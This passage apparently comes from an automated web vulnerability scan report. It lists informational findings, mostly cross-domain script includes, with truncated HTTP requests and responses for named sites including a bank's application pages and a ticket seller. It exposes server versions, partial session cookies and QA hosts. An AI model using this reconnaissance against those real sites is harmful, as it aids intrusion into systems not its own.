| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-AspNetMvc-Version: 1.0 Cache-Control: private Content-Type: text/html; charset=utf-8 Cteonnt-Length: 5156 Content-Length: 5156 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> </title> ...[SNIP]... <div class="mnuTopLink"> <a href="http://www.regions ...[SNIP]... <div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions ...[SNIP]... <div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions ...[SNIP]... <div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions ...[SNIP]... <div class='lmcItems'><a class='lmcLink' href='http://www.regions ...[SNIP]... <div class='lmcItems'><a class='lmcLink' href='http://www.regions ...[SNIP]... <div class='lmcItems'><a class='lmcLink' href='http://www.regions ...[SNIP]... <div class='lmcHeader'><a class='lmcHeaderLink' href='http://www.regions ...[SNIP]... <img align="Left" alt="Regions Mortgage Equal Housing" class="" id="EqualHousing" src="/App_Themes/PC <a href='http://www.regions ...[SNIP]... <div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | /Portals/64787/foote | 
| GET /Portals/64787/foote Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.xsnet.com/ Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Wed, 27 Apr 2011 23:50:34 GMT Accept-Ranges: bytes ETag: "0c12ce6355cc1:101a8" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET Date: Mon, 16 May 2011 17:08:01 GMT Content-Length: 1751 <div class="footerInner"> <div id="left"> <ul> <li><a href="/it-maintenance <li><a href="/datacenter ...[SNIP]... </span> <a href="http://www.facebook <a href="http://twitter.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/ErrorPage.aspx | 
| GET /oao/ErrorPage.aspx HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:21:02 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 9876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... </script> <script src="http://qaappsat ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app01.aspx | 
| GET /oao/app01.aspx?type Host: secureapps.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Date: Mon, 16 May 2011 15:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 48498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... </script> <script src="http://qaappsat ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app02.aspx | 
| GET /oao/app02.aspx?type Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:42 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 76388 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... </script> <script src="http://qaappsat ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.cloudscan.me | 
| Path: | /p/enterprise-exploit | 
| GET /p/enterprise-exploit Host: www.cloudscan.me Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Mon, 16 May 2011 14:32:28 GMT Date: Mon, 16 May 2011 14:32:28 GMT Last-Modified: Mon, 16 May 2011 14:20:53 GMT ETag: "6bfadf56-f9fa-42d5-bd0e X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate Age: 0 Content-Length: 64616 <!DOCTYPE html> <html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org ...[SNIP]... <!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear --> <script type='text/javascript' src='http://hostedusa3 ...[SNIP]... </div> <script src="http://www.google ...[SNIP]... </script><script type="text/javascript" src="http://www.blogger <script type="text/javascript" src="http://www.google <script type="text/javascript" src="http://www.google ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:22:42 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Set-Cookie: PHPSESSID=b0i6udgq1j Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Concerts/U2_Tickets.htm | 
| GET /Concerts/U2_Tickets.htm HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 26045 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Event/U2_Rescheduled | 
| GET /Event/U2_Rescheduled Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:43 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Sell-Tickets | 
| GET /Sell-Tickets HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:07 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15495 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Sports_Tickets | 
| GET /Sports_Tickets HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17066 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /Cart | 
| GET /Cart HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:25 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13094 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /Cart/Address | 
| GET /Cart/Address HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:27:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /members/login | 
| GET /members/login HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:12 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13047 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11476 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /company.php | 
| GET /company.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com/ Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:38 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 11250 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /contact.php | 
| GET /contact.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 11383 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/albany-times | 
| GET /flyerboard/albany-times Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:48 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 5473 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/app.com/1992 | 
| GET /flyerboard/app.com/1992 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3940 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/code | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:16:19 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4172 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/code | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:16:48 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4172 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/conifer-park | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4095 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/conifer-park | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4095 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/electrical | 
| GET /flyerboard/electrical Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:17:18 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5688 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/helderberg | 
| GET /flyerboard/helderberg Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4136 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/mount- | 
| GET /flyerboard/mount- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4107 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/mount-loretto | 
| GET /flyerboard/mount-loretto Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
